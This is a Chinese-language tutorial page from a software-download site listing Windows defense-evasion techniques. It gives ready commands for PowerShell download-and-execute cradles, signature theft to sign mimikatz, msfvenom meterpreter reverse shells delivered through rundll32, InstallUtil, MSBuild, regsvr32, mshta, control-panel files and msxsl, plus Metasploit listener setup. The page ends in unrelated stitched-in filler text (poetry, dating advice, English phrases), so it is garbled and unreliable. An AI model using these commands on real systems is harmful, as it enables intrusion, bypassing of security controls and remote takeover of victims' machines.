网站首页 软件下载 游戏下载 翻译软件 电子书下载 电影下载 电视剧下载 教程攻略
标题 | Windows命令执行防御规避总结 |
分类 | 软件教程 |
内容 | 今天小编为大家带来Windows命令执行防御规避总结,具体如下: ![]() powershell powershell.exe -nop -w hidden -c \\“IEX ((new-object net.webclient).downloadstring(‘http://xx.xx.xx.xx:8888/logo.gif’))\\”“ /f SIP 通过sip劫持对恶意代码签名获得系统信任https://github.com/secretsquirrel/SigThief python sigthief.py -i consent.exe -t mimikatz.exe -o signed-mimikatz.exe rundll32.exe 生成 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll 》xxx.dll 目标执行 rundll32.exe shell32.dll,Control_RunDLL xxx.dll Regsvr32.exe msfconsole auxiliary/server/regsvr32_command_delivery_server set CMD net user test 123456 /add 目标执行 regsvr32 /s /n /u /i:http://xx.xx.xx.xx:8080/aPxOb0o scrobj.dll InstallUtil.exe 1.编译后门: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319》csc.exe /r:System.EnterpriseServices.dll /unsafe /target:library /out:xxx.exe /keyfile:”C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v10.0A\\bin\\NETFX 4.8 Tools\\x64\\key.snk“ xxx.cs 2.靶机上运行: InstallUtil.exe /U xxx.exe 3.msf监听,得到反弹的shell: set payload windows/x64/meterpreter/reverse_tcp set LHOST xx.xx.xx.xx set LPORT 4444 exploit Msbuild.exe MSBuild是Microsoft Build Engine的缩写,代表Microsoft和Visual Studio的新的生成平台,MSBuild可编译特定格式的xml文件 https://github.com/3gstudent/msbuild-inline-task msf生成shellcode msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=4444 -f csharp 使用shellcode替换https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20x64%20shellcode.xml中的shellcode部分 msf监听 use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost xx.xx.xx.xx set lport 4444 exploit 运行 C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe exec64.xml CMSTP cmstp.exe /s /ns C:\\Users\\administrator\\AppData\\Local\\Temp\\XKNqbpzl.txt绕过AppLocker并启动恶意脚本 Mshta.exe Mshta.exe 是一个执行 Microsoft HTML 应用程序 (HTA) 的实用程序,攻击者可以使用 mshta.exe 通过受信任的 Windows 实用程序代理执行恶意代码 use exploit/windows/misc/hta_server msf exploit(windows/misc/hta_server) 》 set srvhost xx.xx.xx.xx msf exploit(windows/misc/hta_server) 》 exploit mshta.exe http://xx.xx.xx.xx:8080/xxxxxxx.hta 控制面板 攻击者可以使用控制面板项作为有效载荷来执行任意命令,控制面板项是注册的可执行文件(.exe)或控制面板(.cpl)文件,可以直接从命令行执行或通过Control_RunDLL(API)调用或者直接双击文件。 攻击者构造恶意的dll文件CPIApplet.dll 利用msf生成dll文件: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=170.170.64.17 LPORT=4444 -f dll 》 /tmp/CPIApplet.dll 传入windows机器,然后重命名为CPIApplet.cpl,通过control.exe c:\\users\\administrator\\desktop\\CPIApplet.cpl 执行命令 通过msxsl.exe调用恶意xml文件执行脚本 制作两个文件 customers.xml script.xsl xmlns:xsl=”http://www.w3.org/1999/XSL/Transform“ xmlns:msxsl=”urn:schemas-microsoft-com:xslt“ xmlns:user=”http://mycompany.com/mynamespace“》 function xml(nodelist) { var r = new ActiveXObject(”WScript.Shell“).Run(”cmd.exe /k calc.exe“); return nodelist.nextNode().xml; } 开启http服务 python3 -m http.server 8046. 不要因为自己长相不如对方而放弃追求的打算,长相只是一时的印象,真正决定能否结合主要取决于双方的性格。我见过的帅哥配丑女,丑女配帅哥的太多了。 远程下载执行 msxsl.exe http://xx.xx.xx.xx/customers.xml http://xx.xx.xx.xx/scrip.xsl Windows命令执行防御规避总结目苦苦地想(高山深涧苦思冥想)瞪口呆48. 喝咖啡,在举杯就口之际,喝的是一点点凝聚成一小盏的亦虚亦实的嗅觉和味觉。放下杯子以后,回味的是一点点窝心的感觉。come up with 提出;make (good) use of (充分) 利用387.天下事有难易乎?为之,则难者亦易矣;不为,则易者亦难矣。彭端淑《为学》 候馆梅残,溪桥柳细,草薰风暖摇征辔。离愁渐远渐无穷,迢迢不断如春水。腾骧磊落三万匹,皆与此图筋骨同。Windows,Windows命令执行,Windows命令执行防御规避总结All these changes in China’s economic life have brought changes in China’s social and cultural life as well, many of which unwanted. |
随便看 |
|
霍普软件下载网教程攻略栏目提供软件使用教程、手机游戏攻略等方法技巧。